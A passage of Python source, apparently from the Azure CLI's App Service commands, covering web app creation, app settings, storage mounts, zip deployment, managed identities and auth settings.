if is_linux:
if not validate_container_app_create_options(runtime, deployment_container_image_name,
multicontainer_config_type, multicontainer_config_file):
raise CLIError("usage error: --runtime | --deployment-container-image-name |"
" --multicontainer-config-type TYPE --multicontainer-config-file FILE")
if startup_file:
site_config.app_command_line = startup_file
if runtime:
site_config.linux_fx_version = runtime
match = helper.resolve(runtime)
if not match:
raise CLIError("Linux Runtime '{}' is not supported."
" Please invoke 'az webapp list-runtimes --linux' to cross check".format(runtime))
elif deployment_container_image_name:
site_config.linux_fx_version = _format_fx_version(deployment_container_image_name)
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITES_ENABLE_APP_SERVICE_STORAGE",
value="false"))
elif multicontainer_config_type and multicontainer_config_file:
encoded_config_file = _get_linux_multicontainer_encoded_config_from_file(multicontainer_config_file)
site_config.linux_fx_version = _format_fx_version(encoded_config_file, multicontainer_config_type)
elif plan_info.is_xenon: # windows container webapp
site_config.windows_fx_version = _format_fx_version(deployment_container_image_name)
# set the needed app settings for container image validation
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_USERNAME",
value=docker_registry_server_user))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_PASSWORD",
value=docker_registry_server_password))
site_config.app_settings.append(NameValuePair(name="DOCKER_REGISTRY_SERVER_URL",
value=docker_registry_server_url))
elif runtime: # windows webapp with runtime specified
if any([startup_file, deployment_container_image_name, multicontainer_config_file, multicontainer_config_type]):
raise CLIError("usage error: --startup-file or --deployment-container-image-name or "
"--multicontainer-config-type and --multicontainer-config-file is "
"only appliable on linux webapp")
match = helper.resolve(runtime)
if not match:
raise CLIError("Runtime '{}' is not supported. Please invoke 'az webapp list-runtimes' to cross check".format(runtime)) # pylint: disable=line-too-long
match['setter'](cmd=cmd, stack=match, site_config=site_config)
# Be consistent with portal: any windows webapp should have this even it doesn't have node in the stack
if not match['displayName'].startswith('node'):
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
else: # windows webapp without runtime specified
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name="WEBSITE_NODE_DEFAULT_VERSION",
value=node_default_version))
if site_config.app_settings:
for setting in site_config.app_settings:
logger.info('Will set appsetting %s', setting)
if using_webapp_up: # when the routine is invoked as a help method for webapp up
if name_validation.name_available:
logger.info("will set appsetting for enabling build")
site_config.app_settings.append(NameValuePair(name="SCM_DO_BUILD_DURING_DEPLOYMENT", value=True))
if language is not None and language.lower() == 'dotnetcore':
if name_validation.name_available:
site_config.app_settings.append(NameValuePair(name='ANCM_ADDITIONAL_ERROR_PAGE_LINK',
value='https://{}.scm.azurewebsites.net/detectors'
.format(name)))
poller = client.web_apps.create_or_update(resource_group_name, name, webapp_def)
webapp = LongRunningOperation(cmd.cli_ctx)(poller)
# Ensure SCC operations follow right after the 'create', no precedent appsetting update commands
_set_remote_or_local_git(cmd, webapp, resource_group_name, name, deployment_source_url,
deployment_source_branch, deployment_local_git)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name)
if deployment_container_image_name:
update_container_settings(cmd, resource_group_name, name, docker_registry_server_url,
deployment_container_image_name, docker_registry_server_user,
docker_registry_server_password=docker_registry_server_password)
if assign_identities is not None:
identity = assign_identity(cmd, resource_group_name, name, assign_identities,
role, None, scope)
webapp.identity = identity
return webapp
def validate_container_app_create_options(runtime=None, deployment_container_image_name=None,
multicontainer_config_type=None, multicontainer_config_file=None):
if bool(multicontainer_config_type) != bool(multicontainer_config_file):
return False
opts = [runtime, deployment_container_image_name, multicontainer_config_type]
return len([x for x in opts if x]) == 1 # you can only specify one out the combinations
def parse_docker_image_name(deployment_container_image_name):
if not deployment_container_image_name:
return None
slash_ix = deployment_container_image_name.rfind('/')
docker_registry_server_url = deployment_container_image_name[0:slash_ix]
if slash_ix == -1 or ("." not in docker_registry_server_url and ":" not in docker_registry_server_url):
return None
return docker_registry_server_url
def update_app_settings(cmd, resource_group_name, name, settings=None, slot=None, slot_settings=None):
if not settings and not slot_settings:
raise CLIError('Usage Error: --settings |--slot-settings')
settings = settings or []
slot_settings = slot_settings or []
app_settings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_application_settings', slot)
result, slot_result = {}, {}
# pylint: disable=too-many-nested-blocks
for src, dest in [(settings, result), (slot_settings, slot_result)]:
for s in src:
try:
temp = shell_safe_json_parse(s)
if isinstance(temp, list): # a bit messy, but we'd like accept the output of the "list" command
for t in temp:
if t.get('slotSetting', True):
slot_result[t['name']] = t['value']
# Mark each setting as the slot setting
else:
result[t['name']] = t['value']
else:
dest.update(temp)
except CLIError:
setting_name, value = s.split('=', 1)
dest[setting_name] = value
result.update(slot_result)
for setting_name, value in result.items():
app_settings.properties[setting_name] = value
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_application_settings',
app_settings.properties, slot, client)
app_settings_slot_cfg_names = []
if slot_result:
new_slot_setting_names = slot_result.keys()
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.app_setting_names = slot_cfg_names.app_setting_names or []
slot_cfg_names.app_setting_names += new_slot_setting_names
app_settings_slot_cfg_names = slot_cfg_names.app_setting_names
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return _build_app_settings_output(result.properties, app_settings_slot_cfg_names)
def add_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type, account_name,
share_name, access_key, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
if custom_id in azure_storage_accounts.properties:
raise CLIError("Site already configured with an Azure storage account with the id '{}'. "
"Use 'az webapp config storage-account update' to update an existing "
"Azure storage account configuration.".format(custom_id))
azure_storage_accounts.properties[custom_id] = AzureStorageInfoValue(type=storage_type, account_name=account_name,
share_name=share_name, access_key=access_key,
mount_path=mount_path)
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def update_azure_storage_account(cmd, resource_group_name, name, custom_id, storage_type=None, account_name=None,
share_name=None, access_key=None, mount_path=None, slot=None, slot_setting=False):
AzureStorageInfoValue = cmd.get_models('AzureStorageInfoValue')
azure_storage_accounts = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
'list_azure_storage_accounts', slot)
existing_account_config = azure_storage_accounts.properties.pop(custom_id, None)
if not existing_account_config:
raise CLIError("No Azure storage account configuration found with the id '{}'. "
"Use 'az webapp config storage-account add' to add a new "
"Azure storage account configuration.".format(custom_id))
new_account_config = AzureStorageInfoValue(
type=storage_type or existing_account_config.type,
account_name=account_name or existing_account_config.account_name,
share_name=share_name or existing_account_config.share_name,
access_key=access_key or existing_account_config.access_key,
mount_path=mount_path or existing_account_config.mount_path
)
azure_storage_accounts.properties[custom_id] = new_account_config
client = web_client_factory(cmd.cli_ctx)
result = _generic_settings_operation(cmd.cli_ctx, resource_group_name, name,
'update_azure_storage_accounts', azure_storage_accounts.properties,
slot, client)
if slot_setting:
slot_cfg_names = client.web_apps.list_slot_configuration_names(resource_group_name, name)
slot_cfg_names.azure_storage_config_names = slot_cfg_names.azure_storage_config_names or []
if custom_id not in slot_cfg_names.azure_storage_config_names:
slot_cfg_names.azure_storage_config_names.append(custom_id)
client.web_apps.update_slot_configuration_names(resource_group_name, name, slot_cfg_names)
return result.properties
def enable_zip_deploy_functionapp(cmd, resource_group_name, name, src, build_remote=False, timeout=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
app = client.web_apps.get(resource_group_name, name)
if app is None:
raise CLIError('The function app \'{}\' was not found in resource group \'{}\'. '
'Please make sure these values are correct.'.format(name, resource_group_name))
parse_plan_id = parse_resource_id(app.server_farm_id)
plan_info = None
retry_delay = 10 # seconds
# We need to retry getting the plan because sometimes if the plan is created as part of function app,
# it can take a couple of tries before it gets the plan
for _ in range(5):
plan_info = client.app_service_plans.get(parse_plan_id['resource_group'],
parse_plan_id['name'])
if plan_info is not None:
break
time.sleep(retry_delay)
if build_remote and not app.reserved:
raise CLIError('Remote build is only available on Linux function apps')
is_consumption = is_plan_consumption(cmd, plan_info)
if (not build_remote) and is_consumption and app.reserved:
return upload_zip_to_storage(cmd, resource_group_name, name, src, slot)
if build_remote:
add_remote_build_app_settings(cmd, resource_group_name, name, slot)
else:
remove_remote_build_app_settings(cmd, resource_group_name, name, slot)
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout, slot)
def enable_zip_deploy_webapp(cmd, resource_group_name, name, src, timeout=None, slot=None):
return enable_zip_deploy(cmd, resource_group_name, name, src, timeout=timeout, slot=slot)
def enable_zip_deploy(cmd, resource_group_name, name, src, timeout=None, slot=None):
logger.warning("Getting scm site credentials for zip deployment")
user_name, password = _get_site_credential(cmd.cli_ctx, resource_group_name, name, slot)
try:
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
except ValueError:
raise CLIError('Failed to fetch scm url for function app')
zip_url = scm_url + '/api/zipdeploy?isAsync=true'
deployment_status_url = scm_url + '/api/deployments/latest'
import urllib3
authorization = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
headers = authorization
headers['Content-Type'] = 'application/octet-stream'
headers['Cache-Control'] = 'no-cache'
headers['User-Agent'] = get_az_user_agent()
import requests
import os
from azure.cli.core.util import should_disable_connection_verify
# Read file content
with open(os.path.realpath(os.path.expanduser(src)), 'rb') as fs:
zip_content = fs.read()
logger.warning("Starting zip deployment. This operation can take a while to complete ...")
res = requests.post(zip_url, data=zip_content, headers=headers, verify=not should_disable_connection_verify())
logger.warning("Deployment endpoint responded with status code %d", res.status_code)
# check if there's an ongoing process
if res.status_code == 409:
raise CLIError("There may be an ongoing deployment or your app setting has WEBSITE_RUN_FROM_PACKAGE. "
"Please track your deployment in {} and ensure the WEBSITE_RUN_FROM_PACKAGE app setting "
"is removed.".format(deployment_status_url))
# check the status of async deployment
response = _check_zip_deployment_status(cmd, resource_group_name, name, deployment_status_url,
authorization, timeout)
return response
def add_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
website_run_from_package = None
enable_oryx_build = None
app_settings_should_not_have = []
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if keyval['name'] == 'WEBSITE_RUN_FROM_PACKAGE':
website_run_from_package = value
if keyval['name'] == 'ENABLE_ORYX_BUILD':
enable_oryx_build = value
if scm_do_build_during_deployment is not True:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to true")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=true"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'true'
if website_run_from_package:
logger.warning("Removing WEBSITE_RUN_FROM_PACKAGE app setting")
delete_app_settings(cmd, resource_group_name, name, [
"WEBSITE_RUN_FROM_PACKAGE"
], slot)
app_settings_should_not_have.append('WEBSITE_RUN_FROM_PACKAGE')
if enable_oryx_build:
logger.warning("Removing ENABLE_ORYX_BUILD app setting")
delete_app_settings(cmd, resource_group_name, name, [
"ENABLE_ORYX_BUILD"
], slot)
app_settings_should_not_have.append('ENABLE_ORYX_BUILD')
# Wait for scm site to get the latest app settings
if app_settings_should_not_have or app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain,
should_not_have=app_settings_should_not_have)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site.")
def remove_remote_build_app_settings(cmd, resource_group_name, name, slot):
settings = get_app_settings(cmd, resource_group_name, name, slot)
scm_do_build_during_deployment = None
app_settings_should_contain = {}
for keyval in settings:
value = keyval['value'].lower()
if keyval['name'] == 'SCM_DO_BUILD_DURING_DEPLOYMENT':
scm_do_build_during_deployment = value in ('true', '1')
if scm_do_build_during_deployment is not False:
logger.warning("Setting SCM_DO_BUILD_DURING_DEPLOYMENT to false")
update_app_settings(cmd, resource_group_name, name, [
"SCM_DO_BUILD_DURING_DEPLOYMENT=false"
], slot)
app_settings_should_contain['SCM_DO_BUILD_DURING_DEPLOYMENT'] = 'false'
# Wait for scm site to get the latest app settings
if app_settings_should_contain:
logger.warning("Waiting SCM site to be updated with the latest app settings")
scm_is_up_to_date = False
retries = 10
while not scm_is_up_to_date and retries >= 0:
scm_is_up_to_date = validate_app_settings_in_scm(
cmd, resource_group_name, name, slot,
should_contain=app_settings_should_contain)
retries -= 1
time.sleep(5)
if retries < 0:
logger.warning("App settings may not be propagated to the SCM site")
def upload_zip_to_storage(cmd, resource_group_name, name, src, slot=None):
settings = get_app_settings(cmd, resource_group_name, name, slot)
storage_connection = None
for keyval in settings:
if keyval['name'] == 'AzureWebJobsStorage':
storage_connection = str(keyval['value'])
if storage_connection is None:
raise CLIError('Could not find a \'AzureWebJobsStorage\' application setting')
container_name = "function-releases"
blob_name = "{}-{}.zip".format(datetime.datetime.today().strftime('%Y%m%d%H%M%S'), str(uuid.uuid4()))
BlockBlobService = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlockBlobService')
block_blob_service = BlockBlobService(connection_string=storage_connection)
if not block_blob_service.exists(container_name):
block_blob_service.create_container(container_name)
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
def progress_callback(current, total):
total_length = 30
filled_length = int(round(total_length * current) / float(total))
percents = round(100.0 * current / float(total), 1)
progress_bar = '=' * filled_length + '-' * (total_length - filled_length)
progress_message = 'Uploading {} {}%'.format(progress_bar, percents)
cmd.cli_ctx.get_progress_controller().add(message=progress_message)
block_blob_service.create_blob_from_path(container_name, blob_name, src, validate_content=True,
progress_callback=progress_callback)
now = datetime.datetime.now()
blob_start = now - datetime.timedelta(minutes=10)
blob_end = now + datetime.timedelta(weeks=520)
BlobPermissions = get_sdk(cmd.cli_ctx, ResourceType.DATA_STORAGE, 'blob#BlobPermissions')
blob_token = block_blob_service.generate_blob_shared_access_signature(container_name,
blob_name,
permission=BlobPermissions(read=True),
expiry=blob_end,
start=blob_start)
blob_uri = block_blob_service.make_blob_url(container_name, blob_name, sas_token=blob_token)
website_run_from_setting = "WEBSITE_RUN_FROM_PACKAGE={}".format(blob_uri)
update_app_settings(cmd, resource_group_name, name, settings=[website_run_from_setting])
client = web_client_factory(cmd.cli_ctx)
try:
logger.info('\nSyncing Triggers...')
if slot is not None:
client.web_apps.sync_function_triggers_slot(resource_group_name, name, slot)
else:
client.web_apps.sync_function_triggers(resource_group_name, name)
except CloudError as ce:
# This SDK function throws an error if Status Code is 200
if ce.status_code != 200:
raise ce
def _generic_settings_operation(cli_ctx, resource_group_name, name, operation_name,
setting_properties, slot=None, client=None):
client = client or web_client_factory(cli_ctx)
operation = getattr(client.web_apps, operation_name if slot is None else operation_name + '_slot')
if slot is None:
return operation(resource_group_name, name, str, setting_properties)
return operation(resource_group_name, name, slot, str, setting_properties)
def show_webapp(cmd, resource_group_name, name, slot=None, app_instance=None):
webapp = app_instance
if not app_instance: # when the routine is invoked as a help method, not through commands
webapp = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
if not webapp:
raise CLIError("'{}' app doesn't exist".format(name))
_rename_server_farm_props(webapp)
_fill_ftp_publishing_url(cmd, webapp, resource_group_name, name, slot)
return webapp
# for generic updater
def get_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def set_webapp(cmd, resource_group_name, name, slot=None, skip_dns_registration=None,
skip_custom_domain_verification=None, force_dns_registration=None, ttl_in_seconds=None, **kwargs):
instance = kwargs['parameters']
client = web_client_factory(cmd.cli_ctx)
updater = client.web_apps.create_or_update_slot if slot else client.web_apps.create_or_update
kwargs = dict(resource_group_name=resource_group_name, name=name, site_envelope=instance,
skip_dns_registration=skip_dns_registration,
skip_custom_domain_verification=skip_custom_domain_verification,
force_dns_registration=force_dns_registration,
ttl_in_seconds=ttl_in_seconds)
if slot:
kwargs['slot'] = slot
return updater(**kwargs)
def update_webapp(instance, client_affinity_enabled=None, https_only=None):
if 'function' in instance.kind:
raise CLIError("please use 'az functionapp update' to update this function app")
if client_affinity_enabled is not None:
instance.client_affinity_enabled = client_affinity_enabled == 'true'
if https_only is not None:
instance.https_only = https_only == 'true'
return instance
def update_functionapp(cmd, instance, plan=None):
client = web_client_factory(cmd.cli_ctx)
if plan is not None:
if is_valid_resource_id(plan):
dest_parse_result = parse_resource_id(plan)
dest_plan_info = client.app_service_plans.get(dest_parse_result['resource_group'],
dest_parse_result['name'])
else:
dest_plan_info = client.app_service_plans.get(instance.resource_group, plan)
if dest_plan_info is None:
raise CLIError("The plan '{}' doesn't exist".format(plan))
validate_plan_switch_compatibility(cmd, client, instance, dest_plan_info)
instance.server_farm_id = dest_plan_info.id
return instance
def validate_plan_switch_compatibility(cmd, client, src_functionapp_instance, dest_plan_instance):
general_switch_msg = 'Currently the switch is only allowed between a Consumption or an Elastic Premium plan.'
src_parse_result = parse_resource_id(src_functionapp_instance.server_farm_id)
src_plan_info = client.app_service_plans.get(src_parse_result['resource_group'],
src_parse_result['name'])
if src_plan_info is None:
raise CLIError('Could not determine the current plan of the functionapp')
if not (is_plan_consumption(cmd, src_plan_info) or is_plan_elastic_premium(cmd, src_plan_info)):
raise CLIError('Your functionapp is not using a Consumption or an Elastic Premium plan. ' + general_switch_msg)
if not (is_plan_consumption(cmd, dest_plan_instance) or is_plan_elastic_premium(cmd, dest_plan_instance)):
raise CLIError('You are trying to move to a plan that is not a Consumption or an Elastic Premium plan. ' +
general_switch_msg)
def set_functionapp(cmd, resource_group_name, name, **kwargs):
instance = kwargs['parameters']
if 'function' not in instance.kind:
raise CLIError('Not a function app to update')
client = web_client_factory(cmd.cli_ctx)
return client.web_apps.create_or_update(resource_group_name, name, site_envelope=instance)
def list_webapp(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' not in r.kind]
def list_deleted_webapp(cmd, resource_group_name=None, name=None, slot=None):
result = _list_deleted_app(cmd.cli_ctx, resource_group_name, name, slot)
return sorted(result, key=lambda site: site.deleted_site_id)
def restore_deleted_webapp(cmd, deleted_id, resource_group_name, name, slot=None, restore_content_only=None):
DeletedAppRestoreRequest = cmd.get_models('DeletedAppRestoreRequest')
request = DeletedAppRestoreRequest(deleted_site_id=deleted_id, recover_configuration=not restore_content_only)
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restore_from_deleted_app', slot, request)
def list_function_app(cmd, resource_group_name=None):
result = _list_app(cmd.cli_ctx, resource_group_name)
return [r for r in result if 'function' in r.kind]
def _list_app(cli_ctx, resource_group_name=None):
client = web_client_factory(cli_ctx)
if resource_group_name:
result = list(client.web_apps.list_by_resource_group(resource_group_name))
else:
result = list(client.web_apps.list())
for webapp in result:
_rename_server_farm_props(webapp)
return result
def _list_deleted_app(cli_ctx, resource_group_name=None, name=None, slot=None):
client = web_client_factory(cli_ctx)
locations = _get_deleted_apps_locations(cli_ctx)
result = list()
for location in locations:
result = result + list(client.deleted_web_apps.list_by_location(location))
if resource_group_name:
result = [r for r in result if r.resource_group == resource_group_name]
if name:
result = [r for r in result if r.deleted_site_name.lower() == name.lower()]
if slot:
result = [r for r in result if r.slot.lower() == slot.lower()]
return result
def _build_identities_info(identities):
from ._appservice_utils import MSI_LOCAL_ID
identities = identities or []
identity_types = []
if not identities or MSI_LOCAL_ID in identities:
identity_types.append('SystemAssigned')
external_identities = [x for x in identities if x != MSI_LOCAL_ID]
if external_identities:
identity_types.append('UserAssigned')
identity_types = ','.join(identity_types)
info = {'type': identity_types}
if external_identities:
info['userAssignedIdentities'] = {e: {} for e in external_identities}
return (info, identity_types, external_identities, 'SystemAssigned' in identity_types)
def assign_identity(cmd, resource_group_name, name, assign_identities=None, role='Contributor', slot=None, scope=None):
ManagedServiceIdentity, ResourceIdentityType = cmd.get_models('ManagedServiceIdentity',
'ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
_, _, external_identities, enable_local_identity = _build_identities_info(assign_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned_user_assigned:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.system_assigned and external_identities:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif webapp.identity and webapp.identity.type == ResourceIdentityType.user_assigned and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities and enable_local_identity:
identity_types = ResourceIdentityType.system_assigned_user_assigned
elif external_identities:
identity_types = ResourceIdentityType.user_assigned
else:
identity_types = ResourceIdentityType.system_assigned
if webapp.identity:
webapp.identity.type = identity_types
else:
webapp.identity = ManagedServiceIdentity(type=identity_types)
if external_identities:
if not webapp.identity.user_assigned_identities:
webapp.identity.user_assigned_identities = {}
for identity in external_identities:
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter, role, scope)
return webapp.identity
def show_identity(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot).identity
def remove_identity(cmd, resource_group_name, name, remove_identities=None, slot=None):
IdentityType = cmd.get_models('ManagedServiceIdentityType')
UserAssignedIdentitiesValue = cmd.get_models('ManagedServiceIdentityUserAssignedIdentitiesValue')
_, _, external_identities, remove_local_identity = _build_identities_info(remove_identities)
def getter():
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get', slot)
def setter(webapp):
if webapp.identity is None:
return webapp
to_remove = []
existing_identities = {x.lower() for x in list((webapp.identity.user_assigned_identities or {}).keys())}
if external_identities:
to_remove = {x.lower() for x in external_identities}
non_existing = to_remove.difference(existing_identities)
if non_existing:
raise CLIError("'{}' are not associated with '{}'".format(','.join(non_existing), name))
if not list(existing_identities - to_remove):
if webapp.identity.type == IdentityType.user_assigned:
webapp.identity.type = IdentityType.none
elif webapp.identity.type == IdentityType.system_assigned_user_assigned:
webapp.identity.type = IdentityType.system_assigned
webapp.identity.user_assigned_identities = None
if remove_local_identity:
webapp.identity.type = (IdentityType.none
if webapp.identity.type == IdentityType.system_assigned or
webapp.identity.type == IdentityType.none
else IdentityType.user_assigned)
if webapp.identity.type not in [IdentityType.none, IdentityType.system_assigned]:
webapp.identity.user_assigned_identities = {}
if to_remove:
for identity in list(existing_identities - to_remove):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
else:
for identity in list(existing_identities):
webapp.identity.user_assigned_identities[identity] = UserAssignedIdentitiesValue()
poller = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'create_or_update', slot, webapp)
return LongRunningOperation(cmd.cli_ctx)(poller)
from azure.cli.core.commands.arm import assign_identity as _assign_identity
webapp = _assign_identity(cmd.cli_ctx, getter, setter)
return webapp.identity
def get_auth_settings(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_auth_settings', slot)
def is_auth_runtime_version_valid(runtime_version=None):
if runtime_version is None:
return True
if runtime_version.startswith("~") and len(runtime_version) > 1:
try:
int(runtime_version[1:])
except ValueError:
return False
return True
split_versions = runtime_version.split('.')
if len(split_versions) != 3:
return False
for version in split_versions:
try:
int(version)
except ValueError:
return False
return True
def update_auth_settings(cmd, resource_group_name, name, enabled=None, action=None, # pylint: disable=unused-argument
client_id=None, token_store_enabled=None, runtime_version=None, # pylint: disable=unused-argument
token_refresh_extension_hours=None, # pylint: disable=unused-argument
allowed_external_redirect_urls=None, client_secret=None, # pylint: disable=unused-argument
client_secret_certificate_thumbprint=None, # pylint: disable=unused-argument
allowed_audiences=None, issuer=None, facebook_app_id=None, # pylint: disable=unused-argument
facebook_app_secret=None, facebook_oauth_scopes=None, # pylint: disable=unused-argument
twitter_consumer_key=None, twitter_consumer_secret=None, # pylint: disable=unused-argument
google_client_id=None, google_client_secret=None, # pylint: disable=unused-argument
google_oauth_scopes=None, microsoft_account_client_id=None, # pylint: disable=unused-argument
microsoft_account_client_secret=None, # pylint: disable=unused-argument
microsoft_account_oauth_scopes=None, slot=None): # pylint: disable=unused-argument
auth_settings = get_auth_settings(cmd, resource_group_name, name, slot)
UnauthenticatedClientAction = cmd.get_models('UnauthenticatedClientAction')
if action == 'AllowAnonymous':
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.allow_anonymous
elif action:
auth_settings.unauthenticated_client_action = UnauthenticatedClientAction.redirect_to_login_page
auth_settings.default_provider = AUTH_TYPES[action]
# validate runtime version
if not is_auth_runtime_version_valid(runtime_version):
raise CLIError('Usage Error: --runtime-version set to invalid value')
import inspect
frame = inspect.currentframe()
bool_flags = ['enabled', 'token_store_enabled']
# note: getargvalues is used already in azure.cli.core.commands.
# and no simple functional replacement for this deprecating method for 3.5
args, _, _, values = inspect.getargvalues(frame) # pylint: disable=deprecated-method
for arg in args[2:]:
if values.get(arg, None):
setattr(auth_settings, arg, values[arg] if arg not in bool_flags else values[arg] == 'true')
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'update_auth_settings', slot, auth_settings)
def list_instances(cmd, resource_group_name, name, slot=None):
# API Version 2019-08-01 (latest as of writing this code) does not return slot instances, however 2018-02-01 does
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_instance_identifiers', slot,
api_version="2018-02-01")
# Currently using hardcoded values instead of this function. This function calls the stacks API;
# Stacks API is updated with Antares deployments,
# which are infrequent and don't line up with stacks EOL schedule.
def list_runtimes(cmd, linux=False):
client = web_client_factory(cmd.cli_ctx)
runtime_helper = _StackRuntimeHelper(cmd=cmd, client=client, linux=linux)
return [s['displayName'] for s in runtime_helper.stacks]
def list_runtimes_hardcoded(linux=False):
if linux:
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['linux']]
return [s['displayName'] for s in get_file_json(RUNTIME_STACKS)['windows']]
def _rename_server_farm_props(webapp):
# Should be renamed in SDK in a future release
setattr(webapp, 'app_service_plan_id', webapp.server_farm_id)
del webapp.server_farm_id
return webapp
def delete_function_app(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'delete', slot)
def delete_webapp(cmd, resource_group_name, name, keep_metrics=None, keep_empty_plan=None,
keep_dns_registration=None, slot=None):
client = web_client_factory(cmd.cli_ctx)
if slot:
client.web_apps.delete_slot(resource_group_name, name, slot,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
else:
client.web_apps.delete(resource_group_name, name,
delete_metrics=False if keep_metrics else None,
delete_empty_server_farm=False if keep_empty_plan else None,
skip_dns_registration=False if keep_dns_registration else None)
def stop_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'stop', slot)
def start_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'start', slot)
def restart_webapp(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'restart', slot)
def get_site_configs(cmd, resource_group_name, name, slot=None):
return _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'get_configuration', slot)
def get_app_settings(cmd, resource_group_name, name, slot=None):
result = _generic_site_operation(cmd.cli_ctx, resource_group_name, name, 'list_application_settings', slot)
client = web_client_factory(cmd.cli_ctx)
slot_app_setting_names = client.web_apps.list_slot_configuration_names(resource_group_name, name).app_setting_names
return _build_app_settings_output(result.properties, slot_app_setting_names)
# Check if the app setting is propagated to the Kudu site correctly by calling api/settings endpoint
# should_have [] is a list of app settings which are expected to be set
# should_not_have [] is a list of app settings which are expected to be absent
# should_contain {} is a dictionary of app settings which are expected to be set with precise values
# Return True if validation succeeded
def validate_app_settings_in_scm(cmd, resource_group_name, name, slot=None,
should_have=None, should_not_have=None, should_contain=None):
scm_settings = _get_app_settings_from_scm(cmd, resource_group_name, name, slot)
scm_setting_keys = set(scm_settings.keys())
if should_have and not set(should_have).issubset(scm_setting_keys):
return False
if should_not_have and set(should_not_have).intersection(scm_setting_keys):
return False
temp_setting = scm_settings.copy()
temp_setting.update(should_contain or {})
if temp_setting != scm_settings:
return False
return True
@retryable_method(3, 5)
def _get_app_settings_from_scm(cmd, resource_group_name, name, slot=None):
scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
